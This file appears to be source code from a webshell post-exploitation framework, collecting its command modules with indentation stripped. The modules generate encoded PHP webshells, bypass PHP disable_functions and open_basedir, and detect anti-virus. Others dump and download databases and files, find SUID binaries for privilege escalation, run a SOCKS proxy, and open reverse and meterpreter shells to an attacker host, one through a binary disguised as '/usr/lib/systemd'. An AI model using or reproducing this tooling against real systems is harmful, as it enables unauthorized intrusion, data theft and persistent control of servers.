def set_mode(mode: int, test: bool = False):
if (mode == 4 and not gget("webshell.ld_preload_path", "webshell", False)):
disable_func_list = gget("webshell.disable_functions", "webshell")
if (not gget("webshell.ld_preload_path", "webshell", None)):
filename = "/tmp/%s.so" % str(uuid4())
ld_preload_func = send(get_detectd_ld_preload()).r_text.strip()
upload_result = upload(
path.join(getcwd(), "auxiliary", "ld_preload_x86_64.so"), filename, True)
if (not upload_result):
return
gset("webshell.ld_preload_path", filename, True, "webshell")
gset("webshell.ld_preload_func", ld_preload_func, True, "webshell")
if ("putenv" in disable_func_list):
print(color.red("\nputenv is disabled.\n"))
return False
if (not ld_preload_func):
print(color.red("\nNo ld_preload function!\n"))
return False
if (mode in mode_require_ext_dict):
ext = mode_require_ext_dict[mode]
res = send(get_detectd_ext(ext))
if (not res):
return False
text = res.r_text.strip()
if ("exist" not in text):
print(color.red(f"\nNo {ext} extension!\n"))
return False
if (not test):
if (mode == 7):
print(color.yellow(f"\nYou may need to wait 1 second to get the result..\n"))
print(f"\nSet bypass disable_functions: {mode}-{mode_to_desc_dict[mode]}\n")
gset("webshell.bypass_df", mode, True, "webshell")
return True
def run(find_path: str = "/usr&/bin"):
"""
av
(Only for windows) Detect anti-virus software running on the target system.
ps: Need to run system commands
Origin: https://github.com/BrownFly/findAV, https://github.com/gh0stkey/avList
"""
if (not is_windows()):
print(color.red("\nTarget system isn't windows\n"))
return
res = send(get_system_code("tasklist /svc"))
if (not res or not res.r_text
or "No system execute function" in res.r_text):
print(color.red("\nDetect error\n"))
return
with open(path.join(gget("root_path"), "auxiliary", "av", "av.json"),
"r",
encoding="utf-8") as f:
av_processes = loads(f.read())
flag = 0
print("\n" + color.green(" " * 37 + "Result"))
for line in res.r_text.split("\n"):
process = line.split(' ')[0]
if process in av_processes:
flag = 1
print(" %40s - %-30s" %
(color.cyan(process), color.yellow(av_processes[process])))
if (not flag):
print(" %40s / %-30s" %
(color.green('No anti-virus'), color.red('Not found')))
print()
def run(host: str,
username: str,
password: str,
dbname: str = "",
port: int = 0):
"""
db_init
Initialize the database connection.
"""
res = send(get_php(host, username, password, dbname, port))
if (not res):
return
if ("Connect error" in res.r_text):
print("\n" + color.red(res.r_text.strip()) + "\n")
else:
print("\n" + color.green("Connect success"))
gset("db_connected", True, True, "webshell")
gset("db_host", host, True, "webshell")
gset("db_username", username, True, "webshell")
gset("db_password", password, True, "webshell")
gset("db_dbname", dbname, True, "webshell")
gset("db_port", port, True, "webshell")
info = res.r_text.strip()
if (info):
info_list = info.split("\n")
try:
gset("db_current_user", info_list[0], True, "webshell")
gset("db_version", info_list[1], True, "webshell")
print_db_info()
except IndexError:
print("\n" + color.red("Select data error") + "\n")
def thread_upload(web_file_path: str, data: str, number: int, blocksize: int):
global UPLOAD_SUCCESS, COLOR_PRINT_LOCK
retry_time = 5
try:
with COLOR_PRINT_LOCK:
print(color.yellow("[Try] Upload block [%d]" % number))
if (not UPLOAD_SUCCESS):
return
while retry_time:
res = send(get_php_upload(web_file_path, data, number))
if (res.r_text.strip() == "success"):
with COLOR_PRINT_LOCK:
print(color.yellow("[Successs] Upload block [%d]" %
number))
break
else:
retry_time -= 1
with COLOR_PRINT_LOCK:
print(color.red("[Failed] Upload block [%d]" % number))
continue
if (not retry_time):
with COLOR_PRINT_LOCK:
print(color.red("\n[Failed] Upload break [%d]\n" % number))
UPLOAD_SUCCESS = False
raise UploadBreakException("")
except Exception:
UPLOAD_SUCCESS = False
raise UploadBreakException("")
def run(ip: str, ports: str, _type: int = 2, timeout: float = 0.5):
"""
portscan
Scan intranet ports.
eg: portscan {ip} {ports} {_type=[socket|file_get_contents|curl]{1|2|3},default = 2} {timeout=0.5}
"""
if (_type not in [1, 2, 3]):
print(color.red("\nType error!\n"))
return
php = get_php(_type, ip, ports, timeout)
res = send(php)
if (not res):
return
port_result = res.r_json()
# ------------------------------------------
if (len(port_result[0])):
print(
color.green('Open') + ' port:\n' + " " * 4 +
human_friendly_list_print(sorted(port_result[0])) + '\n')
if (len(port_result[1])):
print(
color.red('Close') + ' port:\n' + " " * 4 +
human_friendly_list_print(sorted(port_result[1])) + '\n')
if (len(port_result[2])):
print(
color.magenta('Timeout') + ' port:\n' + " " * 4 +
human_friendly_list_print(sorted(port_result[2])) + '\n')
print("")
def run(file_path: str, web_file_path: str = "", force: bool = False):
"""
upload
Upload file to target system.
eg: upload {file_path} {web_file_path=file_name} {force=False}
"""
flag = True
if (not web_file_path):
web_file_path = path.basename(file_path)
flag = False
try:
fp = open(file_path, "rb")
except FileNotFoundError:
print("\n" + color.red("Local File not exist") + "\n")
return
php = get_php(web_file_path, force)
res = send(php, files={"file": fp})
if (not res):
return
text = res.r_text.strip()
if text == "success":
if (flag):
print(
color.green(
f"\nUpload {file_path} as {web_file_path} success\n"))
else:
print(color.green(f"\nUpload {file_path} success\n"))
return True
elif text == "exist":
print(color.yellow(f"\n{web_file_path} exist\n"))
return True
else:
print("\n" + color.red("Upload error / Privileges not enough") + "\n")
def run(database: str = "",
table: str = "",
local_path: str = "",
encoding: str = "utf8"):
"""
db_dump
Dump a database or a table to a file, Default file name is {database}.sql.
eg: db_dump {database=current_database} {local_path=doughnuts/target/site.com/{database}.sql} {encoding="utf-8"}
"""
if (not gget("db_connected", "webshell")):
print(color.red("Please run db_init command first"))
return
database = database if database else gget("db_dbname", "webshell")
download_path = local_path or gget("webshell.download_path", "webshell")
if not path.exists(download_path):
makedirs(download_path)
file_name = f"{database}.sql" if (not table) else f"{database}.{table}.sql"
res = send(get_php(database, table, encoding))
if (not res):
return
text = res.r_text.strip()
content = res.r_content.strip()
if (len(text) > 0 and res.status_code == 200):
file_path = path.join(download_path, file_name).replace("\\", "/")
with open(file_path, "wb") as f:
f.write(gzinflate(b64decode(content)))
print("\n" + color.green(f"Dump {database} to {file_name} success") +
"\n")
elif ("Error" in res.r_text):
print("\n" + color.red(res.r_text.strip()) + "\n")
else:
print(color.red("\nError\n"))
def run(lhost: str,
port: int,
mode: int = 0,
fakename: str = "/usr/lib/systemd"):
"""
reshell
Bind a local port and wait for target connect back to get a full shell.
eg: reshell {lhost} {port} {type=[python|upload]{1|2},default = 0 (Python:1 Not Python:2)} {(Only for Mode 2) fakename=/usr/lib/systemd}
"""
if (is_windows(False) or is_windows()):
print(color.red(f"Only for both system is linux."))
return False
try:
port = int(port)
except ValueError:
port = 23333
disable_func_list = gget("webshell.disable_functions", "webshell")
MODE = 1
print(color.yellow(f"Waring: You are using a testing command...."))
print(color.yellow(f" Please make sure Port {port} open...."))
if (mode == 0):
if (has_env("python")):
print(color.green(f"Traget has python environment."))
MODE == 1
else:
print(color.red(f"Traget has not python environment."))
MODE == 2
else:
MODE = int(mode)
if ("proc_open" in disable_func_list):
print(color.red("proc_open is disabled... Try Mode 3"))
return
if (MODE == 1):
print(color.yellow(f"Use Mode 1->python"))
command = get_php(lhost, port)
else:
print(color.yellow(f"Use Mode 2->upload"))
filename = encrypt(f"{lhost}-{port}")
if not upload(
path.join(gget("root_path"), "auxiliary", "reshell",
"reverse_server_x86_64"), "/tmp/%s" % filename,
True):
return
command = get_system_code(
f"cd /tmp && chmod +x {filename} && ./{filename} {fakename}",
False)
t = Thread(target=delay_send, args=(2, command))
t.setDaemon(True)
t.start()
print(f"Bind port {color.yellow(str(port))}...")
if (not bind(port, MODE)):
print(color.red(f"Bind port error."))
if (MODE == 3):
res = send(f"unlink('/tmp/{filename}');")
if (not res):
return
def run(file_name: str,
keyword: str = "POST",
passwd: str = "",
salt: str = "",
_type: int = 1):
"""
generate
Generate a webshell using doughnuts encoding (password and salt none is random).
keyword:
- GET
- POST
- COOKIE
- HEADER
_type:
- 1 : Pudding
- 2 : Icecream
- 3 : Popsicle
- 4 : Gululingbo
"""
raw_keyword = keyword.upper()
if (raw_keyword not in keyword_dict):
print(color.red("\nKeyword error\n"))
return
keyword = keyword_dict[raw_keyword]
if (_type not in type_dict):
print(color.red("\nType error\n"))
return
passwd = str(passwd) if passwd else ranstr(randint(5, 8))
salt = str(salt) if salt else ranstr(randint(5, 8))
php = get_php(keyword, passwd, salt, _type)
file_path, file_name = path.split(path.realpath(file_name))
file_real_path = path.join(file_path, file_name)
if (path.exists(file_real_path)):
print(color.red("\nFile is exist\n"))
return
elif (not path.exists(file_path)):
print(color.red("\nFile path is invalid\n"))
return
with open(file_real_path, "w+") as f:
f.write(php)
print(
color.green(
f"\ngenerate {type_dict[_type]}'s php in {file_real_path}! enjoy it!"
))
print(color.yellow("\nUsage:"))
print(
color.yellow(
f" Interactive interface : connect url {raw_keyword} {passwd} doughnuts-{salt}"
))
print(
color.yellow(
f" Non-Interactive interface: doughnuts connect url {raw_keyword} {passwd} doughnuts-{salt}\n"
))
def run():
"""
db_shell
Get a temporary sql shell of target system.
"""
if (not gget("db_connected", "webshell")):
print(color.red("Please run db_init command first"))
return
print(
color.cyan(
"Eenter interactive temporary sql shell...\n\nUse 'back' command to return doughnuts.\n"
))
database = gget("db_dbname", "webshell")
prompt = "mysql (%s) > "
set_namespace("webshell", False, True)
wordlist = gget("webshell.wordlist")
readline.set_wordlist(NEW_SQL_WORDLIST)
try:
while gget("loop"):
print(prompt % color.cyan(database), end="")
command = readline()
lower_command = command.lower()
if (lower_command.lower() in ['exit', 'quit', 'back']):
print()
break
if (command == ''):
print()
continue
if (lower_command.startswith("use ") and len(lower_command) > 4):
try:
temp_database = match("use ([^;]*);?",
lower_command).group(1)
res = send(check_database(temp_database))
if ("Connect error" in res.r_text):
print("\n" + color.red(res.r_text.strip()) + "\n")
else:
database = temp_database
print("\n" + color.green(
f"Change current database: {database}") + "\n")
except (IndexError, AttributeError):
print("\n" + color.red("SQL syntax error") + "\n")
else:
form = execute_sql_command(command, database)
if (form == ''):
print("\n" +
color.red("Connection Error / SQL syntax error") +
"\n")
else:
print(execute_sql_command(command, database))
finally:
gset("db_dbname", database, True, "webshell")
readline.set_wordlist(wordlist)
def run(timeout: float = 2.0):
"""
check
Check if each webshell is alive.
eg: check {timeout=2.0}
"""
if not exists("webshell.log"):
print(color.red("No webshell.Log"))
return 0
with open("webshell.log", "r") as f:
for index, line in enumerate(f, 1):
url, method, pwd, *encode_functions = line.split("|")
if method == "GET":
raw_key = "params"
elif method == "POST":
raw_key = "data"
elif method == "COOKIE":
raw_key = "cookies"
elif method == "HEADER":
raw_key = "headers"
else:
print(
f"[{color.blue(str(index))}] {color.red('Method error')}")
continue
check_command = "print(md5(1));"
encode_pf = gget("encode.pf")
for func in encode_functions:
if func in encode_pf:
check_command = encode_pf[func].run(check_command)
params_dict = {"data": {}, "timeout": timeout}
params_dict[raw_key] = {}
params_dict[raw_key][pwd] = check_command
common_text, status_code_text = "", "000"
try:
res = post(url, verify=False, **params_dict)
status_code_text = str(res.status_code)
if ("c4ca4238a0b923820dcc509a6f75849b" in res.text):
common_text = color.green("Alive")
else:
common_text = color.red("Not Alive")
except exceptions.Timeout:
common_text = color.yellow("Timeout")
except exceptions.RequestException:
common_text = color.red("Request error")
print(
f"[{color.blue(str(index))}] [{color.yellow(status_code_text)}] {common_text} {url}"
)
def run(id: int = 0):
"""
load
Load a webshell from log.
eg: load {id}
"""
pf = gget("main.pf")
root_path = gget("root_path")
webshell_log_path = path.join(root_path, "webshell.log")
if (not path.exists(webshell_log_path)):
print(color.red("No webshell.log"))
return
f = open(webshell_log_path, "r+")
lines = f.readlines()
try:
if (id <= 0):
line_num = pf["show"].run()
print("choose:>", end="")
load_id = readline()
if (load_id.isdigit()):
load_id = int(load_id)
else:
print(color.red("\nInput Error\n"))
return
else:
load_id = id
line_num = len(lines)
if load_id <= line_num:
data = lines[load_id - 1].strip().split("|")
gset("webshell.from_log", True, namespace="webshell")
connect = pf["connect"].run(*data)
if (not connect):
print(
"\nThis webshell seems to no longer working, do you want to delete it?\n\n(YES/no) >",
end="")
flag = input()
if (flag.lower() in ['n', 'no']):
return
del lines[load_id - 1]
f.seek(0)
f.truncate()
f.write("".join(lines))
else:
print(color.red("ID error"))
finally:
f.close()
def run(database: str = "", local_path: str = "", encoding: str = "utf8", blocksize: int = 1000, exclude: str = "", include: str = "", threads: int = 5):
"""
db_mdump
Dump a database to a file by block compression and multi threads, Default file name is {database}.sql.
You can use exclude options to exclude some tables.
You can also use include options to dump only some tables.
eg: db_mdump {database=current_database} {local_path=doughnuts/target/site.com/{database}.sql} {encoding="utf-8"} {blocksize=1000} {exclude="",eg="table1,table2"} {include="",eg="table1,table2"} {threads=5}
"""
global LOCK
if (not gget("db_connected", "webshell")):
print(color.red("Please run db_init command first"))
return
database = database if database else gget("db_dbname", "webshell")
download_path = local_path or gget("webshell.download_path", "webshell")
if not path.exists(download_path):
makedirs(download_path)
res = send(get_table_name_php(database))
if (not res):
return
tables = res.r_text.strip()
with LOCK:
print(color.yellow(f"\n[Try] Dump {database}\n"))
with ThreadPoolExecutor(max_workers=threads) as tp:
all_task = [tp.submit(thread_dump, database, table, encoding, download_path, blocksize, threads) for table in tables.split("\n") if table not in exclude.split(",")] if (
not include) else [tp.submit(thread_dump, database, table, encoding, download_path, blocksize, threads) for table in tables.split("\n") if table in include.split(",")]
wait(all_task, return_when=ALL_COMPLETED)
with LOCK:
print(color.green(f"\n[Success] Dump {database}\n"))
def thread_dump(database, table, encoding, download_path, blocksize, threads):
global LOCK
table = table if table else "None"
retry_time = 5
row_number = -1
while retry_time and row_number == -1:
row_number = get_table_row_number(database, table)
retry_time -= 1
if (row_number != -1):
with LOCK:
print(f"[Retry] fetch {database}.{table} [rows: {row_number}]")
if (row_number == -1):
with LOCK:
print(color.red(f"[Error] fetch {database}.{table}"))
return
file_name = f"{database}.{table}.sql"
file_path = path.join(download_path, file_name).replace("\\", "/")
with LOCK:
print(color.yellow(
f"[Try] fetch {database}.{table} [rows: {row_number}]"))
with open(file_path, "wb") as f, ThreadPoolExecutor(max_workers=threads) as tp:
f.write(get_table_construct(database, table, encoding))
f.flush()
all_task = [tp.submit(get_data, database, table, encoding, offset, blocksize)
for offset in range(0, row_number, blocksize)]
for future in as_completed(all_task):
result = future.result()
if (result):
f.write(future.result())
f.flush()
with LOCK:
print(color.green(
f"[Success] fetch {database}.{table} [rows: {row_number}]"))
def run(ip: str, port: str, reverse_type: str = "php"):
"""
remp
reverse meterpreter shell to a host from target system.
eg: reverse {ip} {port} {type=php}
reverse_type:
- php(php/meterpreter/reverse_tcp)
- python(python/meterpreter/reverse_tcp)
- bash(cmd/unix/reverse_bash)
"""
reverse_type = str(reverse_type).lower()
if reverse_type == "php":
t = get_php_meterpreter(ip=ip, port=int(port))
elif reverse_type == "python":
t = get_python_meterpreter(ip=ip, port=int(port))
elif reverse_type == "bash":
t = get_bash_cmd(ip=ip, port=int(port))
else:
print(color.red("Reverse type Error."))
return
sleep(1)
if (t.isAlive()):
print(
f"\nReverse meterpreter shell to {ip}:{port} {color.green('success')}.\n"
)
else:
print(f"\nReverse meterpreter shell {color.red('error')}.\n")
def run(web_file_path: str):
"""
write
Write files directly to the target system by notepad/vi.
eg: write {web_file_path}
"""
file_name = path.split(web_file_path)[1]
file_path = gget("webshell.download_path", "webshell").replace(":", "_")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name)
with open(real_file_path, "w"):
pass
open_editor(real_file_path)
with open(real_file_path, "r") as f:
result = base64_encode(f.read())
res = send(
f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
)
if (not res):
return
text = res.r_text.strip()
if (match(r"\w+", text) and text != '0'):
print(color.green(f"\nWrite {web_file_path} success.\n"))
else:
print(
color.red(f"\nWrite {web_file_path} failed.") +
color.yellow("\n\nResponse:") + f"\n{text}\n")
remove(real_file_path)
def run():
"""
show
Show log webshells.
"""
root_path = gget("root_path")
webshell_log_path = path.join(root_path, "webshell.log")
if not path.exists(webshell_log_path):
print(color.red("No webshell.Log"))
return 0
with open(webshell_log_path, "r") as f:
lines = f.readlines()
for index, line in enumerate(lines, 1):
data = line.strip().split("|")
if (len(data) < 3):
continue
data[2] = f"$ {data[2]} $"
encoders = (e for e in data[3:] if ":" not in e)
extra_params = " ".join(e for e in data[3:] if ":" in e)
for func in encoders:
data[2] = f"{func}({data[2]})"
print(
f"[{color.cyan(str(index))}] [{color.yellow(data[1])}] {data[0]} {color.green(data[2])} {extra_params}"
)
return len(lines)
def run(mode: str, *web_file_paths):
"""
chmod
(Only for *unix) Changes file(s) mode.
eg: chmod {mode} {web_file_path}
"""
if (is_windows()):
print(color.red("Target system is windows."))
return
mode = str(mode)
if (len(mode) < 4):
mode = "0" + mode
for each_file_path in web_file_paths:
res = send(
f"print(chmod(base64_decode('{base64_encode(each_file_path)}'), {mode}));"
)
if (not res):
return
text = res.r_text.strip()
if len(text):
print(
f"\nchmod {each_file_path} {mode} {color.green('success')}\n")
else:
print(f"\nchmod {each_file_path} {mode} {color.red('failed')}\n")
def run(switch: str = ""):
"""
verbose
Open / Close verbose info for prompt.
switch:
- ON
- OFF
"""
switch = switch.upper()
if (switch in ["ON", "OFF", ""]):
switch_name = "PROMPT.VERBOSE"
if switch == "":
gset(switch_name, not gget(switch_name, default=False))
elif switch == "ON":
gset(switch_name, True)
elif switch == "OFF":
gset(switch_name, False)
update_prompt()
print(
f"\nSet verbose info: {color.green('On') if gget(switch_name) else color.red('Off')}\n"
)
else:
print(color.red("\nNo this switch\n"))
def run(web_file_path: str,
local_path: str = "",
_use_raw_php_to_zip: bool = True):
"""
dump
Package and compress files in a folder and download it.
eg: dump {web_file_path} {local_path=./site.com/...}
"""
if _use_raw_php_to_zip:
php = get_raw_php(web_file_path)
else:
php = get_zip_php(web_file_path)
res = send(php)
if (not res):
return
content = res.r_content
download_path = local_path or gget("webshell.download_path", "webshell")
if len(content) and res.status_code == 200:
file_name = (gget("webshell.netloc", "webshell") + ".zip" if
(not len(local_path)) else "")
if not path.exists(download_path):
makedirs(download_path)
file_path = path.join(download_path, file_name).replace("\\", "/")
with open(file_path, "wb") as f:
f.write(content)
print(color.green(f"Downloaded file has been saved to {file_path}"))
else:
print(color.red("File not exist / Download error"))
def run(
web_file_path: str,
local_path: str = "",
) -> bool:
"""
download
Download file(s) from target system.
eg: download {web_file_path} {local_path=./site.com/...}
"""
php = get_php(web_file_path)
res = send(php)
if (not res):
return
content = res.r_content
download_path = local_path or gget("webshell.download_path", "webshell")
if len(content):
file_name = path.split(web_file_path)[1]
if not path.exists(download_path):
makedirs(download_path)
file_path = path.join(download_path, file_name)
with open(file_path, "wb") as f:
f.write(content)
print(color.green(f"Downloaded file has been saved to {file_path}"))
return file_path
else:
print(color.red("File not exist / Download error"))
return ''
def run(database: str):
"""
db_use
Change current database.
"""
if (not gget("db_connected", "webshell")):
print(color.red("Please run db_init command first"))
return
res = send(get_php(database))
if ("Connect error" in res.r_text):
print("\n" + color.red(res.r_text.strip()) + "\n")
else:
print("\n" + color.green(f"Change current database: {database}") +
"\n")
gset("db_dbname", database, True, "webshell")
def run(web_file_path: str, editor: str = ""):
"""
write
Write files directly to the target system by notepad / vi as default or your own editor.
eg: write {web_file_path} {editor=""}
"""
file_name = str(uuid4())
file_path = gget("webshell.download_path", "webshell")
if not path.exists(file_path):
makedirs(file_path)
real_file_path = path.join(file_path, file_name).replace("\\", "/")
open(real_file_path, 'a').close()
open_editor(real_file_path, editor)
with open(real_file_path, "r") as f:
result = base64_encode(f.read())
res = send(
f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
)
if (not res):
return
text = res.r_text.strip()
if (match(r"\d+", text)):
print(color.green(f"\nWrite {web_file_path} success.\n"))
else:
print(color.red(f"\nWrite {web_file_path} failed.\n"))
remove(real_file_path)
def run(port: int = 8888):
"""
socks
(Only for *unix) Run a socks5 server on the target system by python.
eg: socks {port=8888}
"""
if (is_windows()):
print(color.red("Target system isn't *unix"))
return
flag = has_env("python")
if flag:
python = get_python(port)
pyname = "check.py"
res = send(
f"print(file_put_contents('/tmp/{pyname}', base64_decode(\"{base64_encode(python)}\")));"
)
if (not res):
return
text = res.r_text.strip()
if not len(text):
print(color.red("Failed to write file in /tmp directory."))
return
t = Thread(target=send,
args=(get_system_code(f"python /tmp/{pyname}"), ))
t.setDaemon(True)
t.start()
t2 = Thread(target=delay_send,
args=(
10.0,
f"unlink('/tmp/{pyname}');",
))
t2.setDaemon(True)
t2.start()
sleep(1)
if (t.isAlive()):
print(
f"\nStart socks5 server listen on {port} {color.green('success')}.\n"
)
else:
print(f"\nStart socks5 server {color.red('error')}.\n")
else:
print(
color.red(
"The target host does not exist or cannot be found in the python environment."
))
def run():
"""
bobd
(Only for *unix) Try to bypass open_basedir by ini_set and chdir.
"""
disable_func_list = gget("webshell.disable_functions", "webshell")
if (is_windows()):
print(color.red("Target system isn't *unix"))
return
if ("chdir" in disable_func_list or ("ini_set" in disable_func_list and "ini_alter" in disable_func_list)):
print("\n" + color.red("ini_set/ini_alter or chdir function is disabled") + "\n")
return
switch = not gget("webshell.bypass_obd", "webshell", default=False)
print(
f"\nbypass open_basedir: {color.green('On') if switch else color.red('Off')}\n")
gset("webshell.bypass_obd", switch, True, "webshell")
def run(find_path: str = "/usr&/bin"):
"""
priv
(Only for *unix) Find all files with suid belonging to root and try to get privilege escalation tips.
ps:use & to split find_path
eg: priv {find_path="/usr&/bin"}
"""
if (is_windows()):
print(color.red("\nTarget system isn't *unix\n"))
return
print(
color.yellow(
f"\nFinding all files with suid belonging to root in {find_path}...\n"
))
phpcode = ""
priv_tips = {}
if ("&" in find_path):
find_paths = find_path.split("&")
else:
find_paths = (find_path, )
for each in find_paths:
phpcode += get_system_code(
f"find {each} -user root -perm -4000 -type f 2>/dev/null")
res = send(phpcode)
if (not res):
return
suid_commands = res.r_text.strip().split("\n")
if (not suid_commands or "No system execute function" in suid_commands[0]):
print(color.red("\nFind error\n"))
return
with open(path.join(gget("root_path"), "auxiliary", "priv", "gtfo.json"),
"r") as f:
priv_tips = loads(f.read())
for cmd_path in suid_commands:
cmd = cmd_path.split("/")[-1]
if (cmd in priv_tips):
print(
color.yellow(cmd_path) +
f" ( https://gtfobins.github.io/gtfobins/{cmd}/ )\n")
for k, v in priv_tips[cmd].items():
info = '\n'.join(v)
print(f"""{color.cyan(k)}\n{color.green(info)}\n""")
def outside_generate(file_path: str,
keyword: str = "POST",
passwd: str = "",
salt: str = "",
_type: int = 1):
try:
_type = int(_type)
except ValueError:
print(color.red("\nType error\n"))
run(file_path, keyword, passwd, salt, _type)
def run():
"""
db_dbs
Output all databases.
"""
if (not gget("db_connected", "webshell")):
print(color.red("Please run db_init command first"))
return
print(execute_sql_command("show databases;", ""))
def run():
"""
db_info
Output database information.
"""
if (not gget("db_connected", "webshell")):
print(color.red("Please run db_init command first"))
return
print_db_info()
def run(database: str = ""):
"""
db_tables
Output all tables of a database.
"""
if (not gget("db_connected", "webshell")):
print(color.red("Please run db_init command first"))
return
database = database if database else gget("db_dbname", "webshell")
print(execute_sql_command("show tables;", database))